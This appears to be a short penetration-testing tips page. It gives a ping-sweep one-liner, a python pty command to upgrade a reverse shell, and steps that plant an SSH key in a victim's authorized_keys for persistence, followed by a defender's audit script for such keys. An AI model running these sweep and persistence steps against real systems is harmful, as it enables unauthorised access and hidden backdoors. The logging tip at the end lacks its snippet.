🫡Tips

Some tips that are very useful in real life.

Ping sweep to quickly discover hosts on the network (/24)

for i in {1..255};do (ping -c 1 172.16.2.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done

Ping sweep to quickly discover hosts on the network (/16)

for j in {1..255};do for i in {1..255};do (ping -c 1 172.16.$j.$i | grep "bytes from"|cut -d ' ' -f4|tr -d ':' &);done;done

Get a proper TTY from a reverse shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Persistence

Once you have a reverse shell, generate an RSA key pair:

ssh-keygen -t rsa

Append the public key to authorized_keys on the victim machine:

echo XXXX >> ~/.ssh/authorized_keys
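Defender's counterpart to the authorized_keys trick above (an added example, not from this page): audit authorized_keys files for keys that look pasted in rather than provisioned. It assumes /etc/passwd lists the home directories to walk.

```shell
#!/usr/bin/env bash
# Added defender-side check, not from the page: list every key in an
# authorized_keys file with its type, options and comment, and count keys
# that look pasted in rather than provisioned (no comment, or unparseable).
# Assumption: /etc/passwd lists the home directories to walk.
KEYTYPE_RE='^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp(256|384|521)|sk-(ssh-ed25519|ecdsa-sha2-nistp256)@openssh\.com)$'

# parse_key LINE -> prints "TYPE|OPTIONS|COMMENT"; returns 1 if no key type is found
parse_key() {
  local opts='' field
  set -- $1                                 # word-split the line on purpose
  for field in "$@"; do
    shift
    if printf '%s\n' "$field" | grep -Eq "$KEYTYPE_RE"; then
      shift                                 # drop the base64 key material
      printf '%s|%s|%s\n' "$field" "${opts# }" "$*"
      return 0
    fi
    opts="$opts $field"                     # fields before the type are options
  done
  return 1
}

# audit_file FILE -> one report line per key, then the suspicious count on its own line
audit_file() {
  local line parsed suspicious=0
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in ''|'#'*) continue ;; esac   # skip blanks and comments
    if parsed=$(parse_key "$line"); then
      printf '%s  %s\n' "$1" "$parsed"
      if [ -z "${parsed##*|}" ]; then suspicious=$((suspicious + 1)); fi  # no comment
    else
      printf '%s  UNPARSEABLE: %s\n' "$1" "$line"
      suspicious=$((suspicious + 1))
    fi
  done < "$1"
  echo "$suspicious"
}

# count_suspicious FILE -> just the number, handy for alerting
count_suspicious() { audit_file "$1" | tail -n 1; }

# audit_all -> every readable authorized_keys under the homes in /etc/passwd
audit_all() {
  local home
  while IFS=: read -r _ _ _ _ _ home _; do
    if [ -r "$home/.ssh/authorized_keys" ]; then audit_file "$home/.ssh/authorized_keys"; fi
  done < /etc/passwd
}
```

Run `audit_all` as root on a periodic job and diff its output against a known-good baseline; a new line, or a non-zero count, is the signal.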

Log all your commands

mkdir ~/.log

Then paste the following at the end of your .zshrc file:

All your logs will be saved in the ~/.log directory. Enjoy!
